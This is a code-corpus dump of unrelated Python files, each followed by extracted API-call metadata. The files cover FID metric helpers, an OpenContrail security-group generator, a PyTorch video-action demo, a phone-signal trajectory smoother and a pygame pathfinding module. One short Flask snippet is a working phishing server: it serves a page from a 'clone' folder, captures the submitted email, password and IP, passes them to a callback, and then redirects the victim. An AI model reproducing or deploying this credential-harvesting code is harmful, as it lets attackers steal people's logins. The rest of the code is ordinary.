"time.time... | [((2677, 2772), 'torch.utils.data.DataLoader', 'torch.utils.data.DataLoader', (['dataset'], {'batch_size': 'batch_size', 'shuffle': '(False)', 'drop_last': '(False)'}), '(dataset, batch_size=batch_size, shuffle=False,\n drop_last=False)\n', (2704, 2772), False, 'import torch\n'), ((2785, 2807), 'numpy.empty', 'np.empty', (['(size, dims)'], {}), '((size, dims))\n', (2793, 2807), True, 'import numpy as np\n'), ((4443, 4461), 'numpy.atleast_1d', 'np.atleast_1d', (['mu1'], {}), '(mu1)\n', (4456, 4461), True, 'import numpy as np\n'), ((4472, 4490), 'numpy.atleast_1d', 'np.atleast_1d', (['mu2'], {}), '(mu2)\n', (4485, 4490), True, 'import numpy as np\n'), ((4505, 4526), 'numpy.atleast_2d', 'np.atleast_2d', (['sigma1'], {}), '(sigma1)\n', (4518, 4526), True, 'import numpy as np\n'), ((4540, 4561), 'numpy.atleast_2d', 'np.atleast_2d', (['sigma2'], {}), '(sigma2)\n', (4553, 4561), True, 'import numpy as np\n'), ((4832, 4843), 'time.time', 'time.time', ([], {}), '()\n', (4841, 4843), False, 'import time\n'), ((5346, 5370), 'numpy.iscomplexobj', 'np.iscomplexobj', (['covmean'], {}), '(covmean)\n', (5361, 5370), True, 'import numpy as np\n'), ((5656, 5673), 'numpy.trace', 'np.trace', (['covmean'], {}), '(covmean)\n', (5664, 5673), True, 'import numpy as np\n'), ((5943, 5963), 'numpy.mean', 'np.mean', (['act'], {'axis': '(0)'}), '(act, axis=0)\n', (5950, 5963), True, 'import numpy as np\n'), ((5976, 6001), 'numpy.cov', 'np.cov', (['act'], {'rowvar': '(False)'}), '(act, rowvar=False)\n', (5982, 6001), True, 'import numpy as np\n'), ((5913, 5932), 'util.tools.device_name', 'tools.device_name', ([], {}), '()\n', (5930, 5932), False, 'from util import tools\n'), ((2911, 2946), 'torch.cat', 'torch.cat', (['(batch, batch, batch)', '(1)'], {}), '((batch, batch, batch), 1)\n', (2920, 2946), False, 'import torch\n'), ((2993, 3008), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (3006, 3008), False, 'import torch\n'), ((3265, 3310), 'torch.nn.functional.adaptive_avg_pool2d', 'adaptive_avg_pool2d', (['pred'], {'output_size': '(1, 1)'}), '(pred, output_size=(1, 1))\n', (3284, 3310), False, 'from torch.nn.functional import adaptive_avg_pool2d\n'), ((5177, 5200), 'numpy.eye', 'np.eye', (['sigma1.shape[0]'], {}), '(sigma1.shape[0])\n', (5183, 5200), True, 'import numpy as np\n'), ((5721, 5737), 'numpy.trace', 'np.trace', (['sigma2'], {}), '(sigma2)\n', (5729, 5737), True, 'import numpy as np\n'), ((4951, 4962), 'time.time', 'time.time', ([], {}), '()\n', (4960, 4962), False, 'import time\n'), ((4989, 5009), 'numpy.isfinite', 'np.isfinite', (['covmean'], {}), '(covmean)\n', (5000, 5009), True, 'import numpy as np\n'), ((5464, 5484), 'numpy.abs', 'np.abs', (['covmean.imag'], {}), '(covmean.imag)\n', (5470, 5484), True, 'import numpy as np\n'), ((5702, 5718), 'numpy.trace', 'np.trace', (['sigma1'], {}), '(sigma1)\n', (5710, 5718), True, 'import numpy as np\n'), ((5399, 5419), 'numpy.diagonal', 'np.diagonal', (['covmean'], {}), '(covmean)\n', (5410, 5419), True, 'import numpy as np\n')] |
from flask import Flask, current_app, request, Request
app = Flask(__name__)
ctx = app.app_context()
ctx.push()
current_app.static_floder = 'static'
ctx.pop()
app.run
| [
"flask.Flask"
] | [((62, 77), 'flask.Flask', 'Flask', (['__name__'], {}), '(__name__)\n', (67, 77), False, 'from flask import Flask, current_app, request, Request\n')] |
# -*- coding: utf-8 -*-
#
# Copyright (c) 2016 Juniper Networks, Inc. All rights reserved.
#
from __future__ import unicode_literals
from builtins import str
from builtins import range
import logging
from netaddr import IPNetwork
from random import randint, choice
import uuid
from .resource import Resource
from ..utils import timeit
logger = logging.getLogger(__name__)
class SecurityGroup(Resource):
_SG_ID_ALLOC_PATH = '/id/security-groups/id/'
_SG_ID_PADDING = 100000
_SG_ID_ALLOC_START_IDX = 8000000 + _SG_ID_PADDING
def __init__(self, db_manager, batch_size, zk_client, project_amount,
amount_per_project):
super(SecurityGroup, self).__init__(db_manager, batch_size, zk_client,
project_amount, amount_per_project)
self._sg_id_allocator = 0
@property
def type(self):
return 'security-group'
@property
def total_amount(self):
total_sg = (self._project_amount + self._amount_per_project *
self._project_amount)
total_acl = total_sg * 2
return total_sg + total_acl
@timeit(return_time_elapsed=True)
def create_resources(self, rules_per_sg):
sgs = []
with self._uuid_cf.batch(queue_size=self._batch_size) as uuid_batch,\
self._fqname_cf.batch(queue_size=self._batch_size) as \
fqname_batch:
for project_idx in range(self._project_amount):
fq_name = [
'default-domain',
'project-%d' % project_idx,
'default',
]
attr = {
'parent_type': 'project',
'security_group_id': self._SG_ID_ALLOC_START_IDX +
self._sg_id_allocator,
'security_group_entries': {
'policy_rule': [
self._get_rule(remote_sg=':'.join(fq_name)),
self._get_rule(ethertype='IPv6',
remote_sg=':'.join(fq_name)),
self._get_rule(direction='egress',
ethertype='IPv4',
remote_ip='0.0.0.0/0'),
self._get_rule(direction='egress',
ethertype='IPv6',
remote_ip='::/0'),
],
},
}
id_str = "%(#)010d" % {'#': self._SG_ID_PADDING +
self._sg_id_allocator}
self._zk_client.create_node(self._SG_ID_ALLOC_PATH + id_str)
sgs.append(self._create_resource('security_group',
fq_name, attr, uuid_batch,
fqname_batch))
self._sg_id_allocator += 1
for resource_idx in range(self._amount_per_project):
fq_name = [
'default-domain',
'project-%d' % project_idx,
'security-group-%d' % resource_idx,
]
policy_rule = []
for _ in range(rules_per_sg):
random_port = randint(0, 65535)
policy_rule.append(
self._get_rule(
protocol=choice(['udp', 'tcp']),
remote_ip='0.0.0.0/0',
dst_ports=(random_port, random_port)
)
)
attr = {
'parent_type': 'project',
'security_group_id': self._SG_ID_ALLOC_START_IDX +
self._sg_id_allocator,
'security_group_entries': {
'policy_rule': policy_rule,
},
}
id_str = "%(#)010d" % {'#': self._SG_ID_PADDING +
self._sg_id_allocator}
self._zk_client.create_node(self._SG_ID_ALLOC_PATH +
id_str)
sgs.append(self._create_resource('security_group',
fq_name, attr, uuid_batch,
fqname_batch))
self._sg_id_allocator += 1
with self._uuid_cf.batch(queue_size=self._batch_size) as uuid_batch,\
self._fqname_cf.batch(queue_size=self._batch_size) as \
fqname_batch:
for sg in sgs:
ingress, egress = self._policy_rule_to_acl_rule(
sg['security_group_id'],
sg['security_group_entries']['policy_rule'])
fq_name = sg['fq_name'] + ['ingress-access-control-list']
attr = {
'parent_type': 'security-group',
'access_control_list_entries': {
'dynamic': None,
'acl_rule': ingress,
},
}
self._create_resource('access_control_list', fq_name, attr,
uuid_batch, fqname_batch)
fq_name = sg['fq_name'] + ['egress-access-control-list']
attr = {
'parent_type': 'security-group',
'access_control_list_entries': {
'dynamic': None,
'acl_rule': egress,
},
}
self._create_resource('access_control_list', fq_name, attr,
uuid_batch, fqname_batch)
def _policy_rule_to_acl_rule(self, sg_id, prules):
ingress = []
egress = []
for prule in prules:
if prule['src_addresses'][0]['security_group']:
src_sg = sg_id
else:
src_sg = None
if prule['dst_addresses'][0]['security_group']:
dst_sg = sg_id
else:
dst_sg = None
arule = {
'rule_uuid': prule['rule_uuid'],
'match_condition': {
'ethertype': prule['ethertype'],
'src_address': {
'security_group': src_sg,
'subnet': prule['src_addresses'][0]['subnet'],
'virtual_network': None,
'subnet_list': [],
'network_policy': None,
},
'dst_address': {
'security_group': dst_sg,
'subnet': prule['dst_addresses'][0]['subnet'],
'virtual_network': None,
'subnet_list': [],
'network_policy': None,
},
'protocol': prule['protocol'],
'src_port': prule['src_ports'][0],
'dst_port': prule['dst_ports'][0],
},
'action_list': {
'gateway_name': None,
'log': False,
'alert': False,
'assign_routing_instance': None,
'mirror_to': None,
'simple_action': 'pass',
'apply_service': [],
},
}
if (arule['match_condition']['src_address']['security_group'] or
arule['match_condition']['src_address']['subnet']):
ingress.append(arule)
else:
egress.append(arule)
return (ingress, egress)
def _get_rule(self, direction='ingress', ethertype='IPv4', protocol='any',
remote_sg=None, remote_ip=None, src_ports=(0, 65535),
dst_ports=(0, 65535)):
if remote_ip:
ip = IPNetwork(remote_ip)
remote_ip_map = {
'ip_prefix': str(ip.ip),
'ip_prefix_len': ip.prefixlen
}
else:
remote_ip_map = None
return {
'rule_uuid': str(uuid.uuid4()),
'direction': '>',
'ethertype': ethertype,
'protocol': protocol,
'action_list': None,
'application': [],
'rule_sequence': None,
'src_addresses': [{
'security_group':
remote_sg if direction == 'ingress' else 'local',
'subnet': remote_ip_map if direction == 'ingress' else None,
'virtual_network': None,
'subnet_list': [],
'network_policy': None,
}],
'dst_addresses': [{
'security_group':
remote_sg if direction == 'egress' else 'local',
'subnet': remote_ip_map if direction == 'egress' else None,
'virtual_network': None,
'subnet_list': [],
'network_policy': None,
}],
'src_ports': [{
'start_port': src_ports[0],
'end_port': src_ports[1],
}],
'dst_ports': [{
'start_port': dst_ports[0],
'end_port': dst_ports[1],
}],
}
| [
"logging.getLogger",
"random.choice",
"builtins.str",
"uuid.uuid4",
"builtins.range",
"random.randint",
"netaddr.IPNetwork"
] | [((347, 374), 'logging.getLogger', 'logging.getLogger', (['__name__'], {}), '(__name__)\n', (364, 374), False, 'import logging\n'), ((1451, 1478), 'builtins.range', 'range', (['self._project_amount'], {}), '(self._project_amount)\n', (1456, 1478), False, 'from builtins import range\n'), ((8244, 8264), 'netaddr.IPNetwork', 'IPNetwork', (['remote_ip'], {}), '(remote_ip)\n', (8253, 8264), False, 'from netaddr import IPNetwork\n'), ((3061, 3092), 'builtins.range', 'range', (['self._amount_per_project'], {}), '(self._amount_per_project)\n', (3066, 3092), False, 'from builtins import range\n'), ((8324, 8334), 'builtins.str', 'str', (['ip.ip'], {}), '(ip.ip)\n', (8327, 8334), False, 'from builtins import str\n'), ((8489, 8501), 'uuid.uuid4', 'uuid.uuid4', ([], {}), '()\n', (8499, 8501), False, 'import uuid\n'), ((3368, 3387), 'builtins.range', 'range', (['rules_per_sg'], {}), '(rules_per_sg)\n', (3373, 3387), False, 'from builtins import range\n'), ((3427, 3444), 'random.randint', 'randint', (['(0)', '(65535)'], {}), '(0, 65535)\n', (3434, 3444), False, 'from random import randint, choice\n'), ((3574, 3596), 'random.choice', 'choice', (["['udp', 'tcp']"], {}), "(['udp', 'tcp'])\n", (3580, 3596), False, 'from random import randint, choice\n')] |
import flask ; from flask import *
def Serve(email_form, password_form, rd, dic, host="0.0.0.0", port="8080"):
app = Flask(__name__, template_folder="../clone")
# login storage
class Login:
email = ""
pwd = ""
ip = ""
# forms
@app.get("/")
def index():
return render_template("index.html")
@app.post("/login")
def login():
Login.ip = request.remote_addr
Login.email = request.form.get(email_form)
Login.pwd = request.form.get(password_form)
ouputfunc = dic["func"]
res = dic["res"]
ouputfunc(res=res, Login=Login)
return flask.redirect(rd)
print("\n-= Flask Logs =-")
app.run(host=host, port=port) | [
"flask.redirect"
] | [((658, 676), 'flask.redirect', 'flask.redirect', (['rd'], {}), '(rd)\n', (672, 676), False, 'import flask\n')] |
import torch
import torch.nn as nn
import numpy as np
import cv2
import os
import shutil
from matplotlib import pyplot as plt
from Model_Definition import VC3D
from mypath import NICKNAME, DATA_DIR, PATH
# TODO: Now can display images with plt.show(), need to solve display on cloud instance
OUT_DIR = PATH + os.path.sep + 'Result'
DEMO_DIR = PATH + os.path.sep + 'Demo'
# %%
def check_folder_exist(folder_name):
if os.path.exists(folder_name):
shutil.rmtree(folder_name)
os.makedirs(folder_name)
else:
os.makedirs(folder_name)
check_folder_exist(OUT_DIR)
# %%
def center_crop(frame):
frame = frame[:120, 22:142, :]
return np.array(frame).astype(np.uint8)
# %%
def main():
device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
print("Device being used:", device)
with open('ucf_9_labels.txt', 'r') as f:
class_names = f.readlines()
f.close()
# init model
model = VC3D()
checkpoint = torch.load(f'model_{NICKNAME}.pt', map_location=device)
model.load_state_dict(checkpoint)
model.to(device)
model.eval()
# read video
video_name = 'PlayingGuitar'
video = DATA_DIR + os.path.sep + video_name + os.path.sep + 'v_' + video_name + '_g09_c04.avi'
# video = DEMO_DIR + os.path.sep + video_name + '.mp4'
cap = cv2.VideoCapture(video)
retaining = True
fps = int(cap.get(5))
size = (int(cap.get(3)),
int(cap.get(4)))
fourcc = int(cap.get(6))
frames_num = cap.get(7)
print('Video Readed, with fps %s, size %s and format %s' % (fps, size,
chr(fourcc & 0xFF) + chr((fourcc >> 8) & 0xFF) + chr(
(fourcc >> 16) & 0xFF) + chr(
(fourcc >> 24) & 0xFF)))
out = cv2.VideoWriter(os.path.join(OUT_DIR, video_name + '_result.mp4'), 1983148141, fps, size)
clip = []
count = 0
while retaining:
count += 1
retaining, frame = cap.read()
if not retaining and frame is None:
continue
tmp_ = center_crop(cv2.resize(frame, (171, 128)))
tmp = tmp_ - np.array([[[90.0, 98.0, 102.0]]])
clip.append(tmp)
if len(clip) == 16:
inputs = np.array(clip).astype(np.float32)
inputs = np.expand_dims(inputs, axis=0)
inputs = np.transpose(inputs, (0, 4, 1, 2, 3))
inputs = torch.from_numpy(inputs)
inputs = torch.autograd.Variable(inputs, requires_grad=False).to(device)
with torch.no_grad():
outputs = model.forward(inputs)
probs = nn.Softmax(dim=1)(outputs)
label = torch.max(probs, 1)[1].detach().cpu().numpy()[0]
cv2.putText(frame, class_names[label].split(' ')[-1].strip(), (20, 20),
cv2.FONT_HERSHEY_SIMPLEX, 0.6,
(0, 0, 255), 1)
cv2.putText(frame, "prob: %.4f" % probs[0][label], (20, 40),
cv2.FONT_HERSHEY_SIMPLEX, 0.6,
(0, 0, 255), 1)
out.write(frame)
clip.pop(0)
if count % 10 == 0:
print(str(count / frames_num * 100) + '%')
if cv2.waitKey(1) & 0xFF == ord('q'):
break
# cv2.imshow('result', frame)
# cv2.waitKey(30)
# plt.imshow(cv2.cvtColor(frame, cv2.COLOR_BGR2RGB))
# plt.title('result')
# plt.show()
out.release()
cap.release()
cv2.destroyAllWindows()
if __name__ == '__main__':
main() | [
"Model_Definition.VC3D",
"torch.max",
"torch.from_numpy",
"numpy.array",
"torch.cuda.is_available",
"cv2.destroyAllWindows",
"os.path.exists",
"torch.autograd.Variable",
"cv2.waitKey",
"cv2.putText",
"cv2.resize",
"numpy.transpose",
"os.makedirs",
"torch.nn.Softmax",
"torch.load",
"os.... | [((424, 451), 'os.path.exists', 'os.path.exists', (['folder_name'], {}), '(folder_name)\n', (438, 451), False, 'import os\n'), ((967, 973), 'Model_Definition.VC3D', 'VC3D', ([], {}), '()\n', (971, 973), False, 'from Model_Definition import VC3D\n'), ((991, 1046), 'torch.load', 'torch.load', (['f"""model_{NICKNAME}.pt"""'], {'map_location': 'device'}), "(f'model_{NICKNAME}.pt', map_location=device)\n", (1001, 1046), False, 'import torch\n'), ((1342, 1365), 'cv2.VideoCapture', 'cv2.VideoCapture', (['video'], {}), '(video)\n', (1358, 1365), False, 'import cv2\n'), ((3628, 3651), 'cv2.destroyAllWindows', 'cv2.destroyAllWindows', ([], {}), '()\n', (3649, 3651), False, 'import cv2\n'), ((461, 487), 'shutil.rmtree', 'shutil.rmtree', (['folder_name'], {}), '(folder_name)\n', (474, 487), False, 'import shutil\n'), ((496, 520), 'os.makedirs', 'os.makedirs', (['folder_name'], {}), '(folder_name)\n', (507, 520), False, 'import os\n'), ((539, 563), 'os.makedirs', 'os.makedirs', (['folder_name'], {}), '(folder_name)\n', (550, 563), False, 'import os\n'), ((1938, 1987), 'os.path.join', 'os.path.join', (['OUT_DIR', "(video_name + '_result.mp4')"], {}), "(OUT_DIR, video_name + '_result.mp4')\n", (1950, 1987), False, 'import os\n'), ((670, 685), 'numpy.array', 'np.array', (['frame'], {}), '(frame)\n', (678, 685), True, 'import numpy as np\n'), ((760, 785), 'torch.cuda.is_available', 'torch.cuda.is_available', ([], {}), '()\n', (783, 785), False, 'import torch\n'), ((2210, 2239), 'cv2.resize', 'cv2.resize', (['frame', '(171, 128)'], {}), '(frame, (171, 128))\n', (2220, 2239), False, 'import cv2\n'), ((2262, 2295), 'numpy.array', 'np.array', (['[[[90.0, 98.0, 102.0]]]'], {}), '([[[90.0, 98.0, 102.0]]])\n', (2270, 2295), True, 'import numpy as np\n'), ((2425, 2455), 'numpy.expand_dims', 'np.expand_dims', (['inputs'], {'axis': '(0)'}), '(inputs, axis=0)\n', (2439, 2455), True, 'import numpy as np\n'), ((2477, 2514), 'numpy.transpose', 'np.transpose', (['inputs', '(0, 4, 1, 2, 3)'], {}), '(inputs, (0, 4, 1, 2, 3))\n', (2489, 2514), True, 'import numpy as np\n'), ((2536, 2560), 'torch.from_numpy', 'torch.from_numpy', (['inputs'], {}), '(inputs)\n', (2552, 2560), False, 'import torch\n'), ((3037, 3149), 'cv2.putText', 'cv2.putText', (['frame', "('prob: %.4f' % probs[0][label])", '(20, 40)', 'cv2.FONT_HERSHEY_SIMPLEX', '(0.6)', '(0, 0, 255)', '(1)'], {}), "(frame, 'prob: %.4f' % probs[0][label], (20, 40), cv2.\n FONT_HERSHEY_SIMPLEX, 0.6, (0, 0, 255), 1)\n", (3048, 3149), False, 'import cv2\n'), ((2663, 2678), 'torch.no_grad', 'torch.no_grad', ([], {}), '()\n', (2676, 2678), False, 'import torch\n'), ((2749, 2766), 'torch.nn.Softmax', 'nn.Softmax', ([], {'dim': '(1)'}), '(dim=1)\n', (2759, 2766), True, 'import torch.nn as nn\n'), ((2370, 2384), 'numpy.array', 'np.array', (['clip'], {}), '(clip)\n', (2378, 2384), True, 'import numpy as np\n'), ((2582, 2634), 'torch.autograd.Variable', 'torch.autograd.Variable', (['inputs'], {'requires_grad': '(False)'}), '(inputs, requires_grad=False)\n', (2605, 2634), False, 'import torch\n'), ((3352, 3366), 'cv2.waitKey', 'cv2.waitKey', (['(1)'], {}), '(1)\n', (3363, 3366), False, 'import cv2\n'), ((2796, 2815), 'torch.max', 'torch.max', (['probs', '(1)'], {}), '(probs, 1)\n', (2805, 2815), False, 'import torch\n')] |
"""Transform signaling data to smoothed trajectories."""
import sys
import numpy
import pandas as pd
import geopandas as gpd
import shapely.geometry
import matplotlib.patches
import matplotlib.pyplot as plt
import mobilib.voronoi
SAMPLING = pd.Timedelta('00:01:00')
STD = pd.Timedelta('00:05:00')
def smoothen(array, std_quant):
return pd.Series(array).rolling(
int(numpy.ceil(8 * std_quant)),
min_periods=0,
center=True,
win_type='gaussian'
).mean(std=std_quant)
def trajectory(df, xcol, ycol, sampling, std):
ts = pd.date_range(df.index.min(), df.index.max(), freq=sampling)
obs_ind = ts.searchsorted(df.index)
xs_src = numpy.full(ts.size, numpy.nan)
xs_src[obs_ind] = df[xcol]
ys_src = numpy.full(ts.size, numpy.nan)
ys_src[obs_ind] = df[ycol]
std_quant = std / sampling
return smoothen(xs_src, std_quant), smoothen(ys_src, std_quant), ts
if __name__ == '__main__':
signals = pd.read_csv(sys.argv[1], sep=';')
signals = signals[signals['phone_nr'] == int(sys.argv[3])]
signals['pos_time'] = pd.to_datetime(signals['pos_time'])
timeweights = (1 / signals.groupby('pos_time')['phone_nr'].count()).reset_index().rename(columns={'phone_nr' : 'weight'})
signals = pd.merge(signals, timeweights, on='pos_time')
antennas = pd.read_csv(sys.argv[2], sep=';')
siglocs = pd.merge(signals, antennas, on='cell_name').groupby('pos_time').agg({
'xcent': 'mean',
'ycent': 'mean',
})
xpos, ypos, tpos = trajectory(siglocs, 'xcent', 'ycent', sampling=SAMPLING, std=STD)
plt.plot(xpos, ypos)
plt.scatter(antennas.xcent, antennas.ycent, s=9, color='orange')
plt.gca().set_aspect('equal')
plt.show()
pd.DataFrame({'x': xpos, 'y': ypos, 't': tpos}).to_csv(sys.argv[4], sep=';', index=False) | [
"pandas.Series",
"numpy.ceil",
"pandas.read_csv",
"matplotlib.pyplot.gca",
"pandas.Timedelta",
"pandas.merge",
"matplotlib.pyplot.plot",
"matplotlib.pyplot.scatter",
"pandas.DataFrame",
"numpy.full",
"pandas.to_datetime",
"matplotlib.pyplot.show"
] | [((246, 270), 'pandas.Timedelta', 'pd.Timedelta', (['"""00:01:00"""'], {}), "('00:01:00')\n", (258, 270), True, 'import pandas as pd\n'), ((277, 301), 'pandas.Timedelta', 'pd.Timedelta', (['"""00:05:00"""'], {}), "('00:05:00')\n", (289, 301), True, 'import pandas as pd\n'), ((683, 713), 'numpy.full', 'numpy.full', (['ts.size', 'numpy.nan'], {}), '(ts.size, numpy.nan)\n', (693, 713), False, 'import numpy\n'), ((758, 788), 'numpy.full', 'numpy.full', (['ts.size', 'numpy.nan'], {}), '(ts.size, numpy.nan)\n', (768, 788), False, 'import numpy\n'), ((966, 999), 'pandas.read_csv', 'pd.read_csv', (['sys.argv[1]'], {'sep': '""";"""'}), "(sys.argv[1], sep=';')\n", (977, 999), True, 'import pandas as pd\n'), ((1089, 1124), 'pandas.to_datetime', 'pd.to_datetime', (["signals['pos_time']"], {}), "(signals['pos_time'])\n", (1103, 1124), True, 'import pandas as pd\n'), ((1265, 1310), 'pandas.merge', 'pd.merge', (['signals', 'timeweights'], {'on': '"""pos_time"""'}), "(signals, timeweights, on='pos_time')\n", (1273, 1310), True, 'import pandas as pd\n'), ((1326, 1359), 'pandas.read_csv', 'pd.read_csv', (['sys.argv[2]'], {'sep': '""";"""'}), "(sys.argv[2], sep=';')\n", (1337, 1359), True, 'import pandas as pd\n'), ((1594, 1614), 'matplotlib.pyplot.plot', 'plt.plot', (['xpos', 'ypos'], {}), '(xpos, ypos)\n', (1602, 1614), True, 'import matplotlib.pyplot as plt\n'), ((1619, 1683), 'matplotlib.pyplot.scatter', 'plt.scatter', (['antennas.xcent', 'antennas.ycent'], {'s': '(9)', 'color': '"""orange"""'}), "(antennas.xcent, antennas.ycent, s=9, color='orange')\n", (1630, 1683), True, 'import matplotlib.pyplot as plt\n'), ((1722, 1732), 'matplotlib.pyplot.show', 'plt.show', ([], {}), '()\n', (1730, 1732), True, 'import matplotlib.pyplot as plt\n'), ((1688, 1697), 'matplotlib.pyplot.gca', 'plt.gca', ([], {}), '()\n', (1695, 1697), True, 'import matplotlib.pyplot as plt\n'), ((1737, 1784), 'pandas.DataFrame', 'pd.DataFrame', (["{'x': xpos, 'y': ypos, 't': tpos}"], {}), "({'x': xpos, 'y': ypos, 't': tpos})\n", (1749, 1784), True, 'import pandas as pd\n'), ((347, 363), 'pandas.Series', 'pd.Series', (['array'], {}), '(array)\n', (356, 363), True, 'import pandas as pd\n'), ((385, 410), 'numpy.ceil', 'numpy.ceil', (['(8 * std_quant)'], {}), '(8 * std_quant)\n', (395, 410), False, 'import numpy\n'), ((1374, 1417), 'pandas.merge', 'pd.merge', (['signals', 'antennas'], {'on': '"""cell_name"""'}), "(signals, antennas, on='cell_name')\n", (1382, 1417), True, 'import pandas as pd\n')] |
#!/usr/bin/env python
# -*- coding:utf8 -*-
import sys
import argparse
from lantis.webradio.commands import bind_subparsers
parser = argparse.ArgumentParser()
subparsers = parser.add_subparsers()
bind_subparsers(subparsers)
def main(argv=None):
if argv is None:
argv = sys.argv[1:]
args = parser.parse_args()
command = args.Command(args)
return command.run()
if __name__ == '__main__':
ret = main()
sys.exit(ret)
| [
"lantis.webradio.commands.bind_subparsers",
"argparse.ArgumentParser",
"sys.exit"
] | [((135, 160), 'argparse.ArgumentParser', 'argparse.ArgumentParser', ([], {}), '()\n', (158, 160), False, 'import argparse\n'), ((198, 225), 'lantis.webradio.commands.bind_subparsers', 'bind_subparsers', (['subparsers'], {}), '(subparsers)\n', (213, 225), False, 'from lantis.webradio.commands import bind_subparsers\n'), ((437, 450), 'sys.exit', 'sys.exit', (['ret'], {}), '(ret)\n', (445, 450), False, 'import sys\n')] |
# Pathfinding algorithm.
import pygame
import random
class HotTile( object ):
def __init__( self ):
self.heat = 9999
self.cost = 0
self.block = False
class HotMap( object ):
DELTA8 = [ (-1,-1), (0,-1), (1,-1), (-1,0), (1,0), (-1,1), (0,1), (1,1) ]
EXPENSIVE = 9999
def __init__( self, scene, hot_points, obstacles=set(), expensive=set(), limits=None, avoid_models=False ):
"""Calculate this hotmap given scene and set of hot points."""
# Obstacles block movement.
# Expensive tiles are avoided, if possible.
self.scene = scene
if avoid_models:
obstacles = self.list_model_positions().union( obstacles )
self.obstacles = obstacles
self.expensive = expensive
self.map = [[ int(self.EXPENSIVE)
for y in range(scene.height) ]
for x in range(scene.width) ]
for p in hot_points:
if len( p ) < 3:
self.map[p[0]][p[1]] = 0
else:
self.map[p[0]][p[1]] = min( p[2], self.map[p[0]][p[1]] )
if limits:
self.lo_x = max( limits.x, 1 )
self.hi_x = min( limits.x + limits.width + 1, scene.width - 1 )
self.lo_y = max( limits.y, 1 )
self.hi_y = min( limits.y + limits.height + 1, scene.height - 1 )
else:
self.lo_x,self.hi_x,self.lo_y,self.hi_y = 1, scene.width-1, 1, scene.height-1
self.process_map( limits )
def process_map( self, limits ):
# Iterate through each of the tiles,
flag = True
while flag:
flag = False
for y in range( self.lo_y, self.hi_y ):
for x in range( self.lo_x, self.hi_x ):
p = (x,y)
if not self.blocks_movement( x, y ):
dh = 2 + self.map[x-1][y]
dv = 2 + self.map[x][y-1]
dd = 3 + self.map[x-1][y-1]
dp = 3 + self.map[x+1][y-1]
dp = min(dh,dv,dd,dp)
if p in self.expensive:
dp += 16
if dp < self.map[x][y]:
self.map[x][y] = dp
flag = True
for y in range( self.hi_y-1, self.lo_y-1, -1 ):
for x in range( self.hi_x-1, self.lo_x-1, -1 ):
if not self.blocks_movement( x, y ):
dh = 2 + self.map[x+1][y]
dv = 2 + self.map[x][y+1]
dd = 3 + self.map[x+1][y+1]
dp = 3 + self.map[x-1][y+1]
dp = min(dh,dv,dd,dp)
if p in self.expensive:
dp += 16
if dp < self.map[x][y]:
self.map[x][y] = dp
flag = True
def blocks_movement( self, x, y ):
return self.scene.map[x][y].blocks_walking() or (x,y) in self.obstacles
def list_model_positions( self ):
mylist = set()
for m in self.scene.contents:
if self.scene.is_model(m):
mylist.add( m.pos )
return mylist
def downhill_dir( self, pos ):
"""Return a dx,dy tuple showing the lower heat value."""
best_d = None
random.shuffle( self.DELTA8 )
heat = self.map[pos[0]][pos[1]]
for d in self.DELTA8:
x2 = d[0] + pos[0]
y2 = d[1] + pos[1]
if self.scene.on_the_map(x2,y2) and ( self.map[x2][y2] < heat ):
heat = self.map[x2][y2]
best_d = d
return best_d
def clever_downhill_dir( self, exp, pos ):
"""Return the best direction to move in, avoiding models."""
best_d = None
random.shuffle( self.DELTA8 )
heat = self.map[pos[0]][pos[1]]
for d in self.DELTA8:
x2 = d[0] + pos[0]
y2 = d[1] + pos[1]
if exp.scene.on_the_map(x2,y2) and ( self.map[x2][y2] < heat ):
target = exp.scene.get_character_at_spot( (x2,y2) )
if not target:
heat = self.map[x2][y2]
best_d = d
return best_d
def mix( self, other_map, amount ):
for y in range( self.lo_y, self.hi_y ):
for x in range( self.lo_x, self.hi_x ):
self.map[x][y] += other_map.map[x][y] * amount
def show( self, x0, y0 ):
for y in range( y0-2,y0+3):
vals = list()
for x in range( x0-2,x0+3):
if self.scene.on_the_map(x,y):
vals.append( '{:<8}'.format( self.map[x][y] ) )
else:
vals.append( "XXX" )
print(" ".join( vals ))
class AvoidMap( HotMap ):
def __init__( self, scene, hot_points, obstacles=set(), expensive=set(), limits=None, avoid_models=False ):
"""Calculate this hotmap given scene and set of hot points."""
super( AvoidMap, self ).__init__( scene, hot_points, obstacles, expensive=expensive, avoid_models=avoid_models, limits=limits )
for y in range( self.lo_y, self.hi_y ):
for x in range( self.lo_x, self.hi_x ):
if self.map[x][y] < self.EXPENSIVE:
self.map[x][y] *= -1.2
self.process_map( limits )
class PointMap( HotMap ):
def __init__( self, scene, dest, avoid_models = False, expensive=set(), limits=None ):
myset = set()
myset.add( dest )
super( PointMap, self ).__init__( scene, myset, expensive=expensive, avoid_models=avoid_models, limits=limits )
class MoveMap( HotMap ):
"""Calculates movement costs to different tiles. Only calcs as far as necessary."""
def __init__( self, scene, chara, avoid_models = False ):
myset = set()
myset.add( chara.pos )
reach = ( chara.get_move() + 1 ) // 2
super( MoveMap, self ).__init__( scene, myset, limits=pygame.Rect(chara.pos[0]-reach, chara.pos[1]-reach, reach*2+1, reach*2+1 ), avoid_models=avoid_models )
if __name__=='__main__':
import timeit
from . import maps
import random
import pygame
myscene = maps.Scene( 100 , 100 )
for x in range( 5, myscene.width ):
for y in range( 5, myscene.height ):
if random.randint(1,3) == 1:
myscene.map[x][y].wall = maps.BASIC_WALL
myset = set()
myset.add( (23,23) )
class OldWay( object ):
def __init__( self, m ):
self.m = m
def __call__(self):
HotMap( self.m, myset )
class NewWay( object ):
def __init__( self, m ):
self.m = m
self.myrect = pygame.Rect( 20, 20, 5, 5 )
def __call__(self):
HotMap( self.m, myset, limits=self.myrect )
t1 = timeit.Timer( OldWay( myscene ) )
t2 = timeit.Timer( NewWay( myscene ) )
print(t1.timeit(100))
print(t2.timeit(100))
| [
"random.randint",
"random.shuffle",
"pygame.Rect"
